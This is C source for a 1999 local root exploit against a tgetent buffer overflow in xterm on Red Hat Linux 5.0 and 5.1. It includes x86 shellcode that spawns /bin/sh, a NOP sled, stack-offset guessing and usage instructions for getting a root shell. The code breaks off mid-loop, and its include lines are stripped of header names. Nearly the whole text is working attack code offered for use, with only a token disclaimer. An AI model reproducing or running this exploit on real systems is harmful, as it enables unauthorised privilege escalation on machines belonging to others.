/* xterm exploit code for x86 linux tgetent function buffer overflow Local user can gain root access. Tested redhat linux : 5.0, 5.1 Tested termcap : 9.12.6 Usage $ xterm-ex 0 | +------ try from -2000 to 2000 ( try in steps of 500 ) This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1999/08/31 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include #include #define OFFSET -2000 #define RET_POSITION 3160 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } int main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; FILE *file; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc>1) offset+=atoi(argv[1]); sp=get_esp(); addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i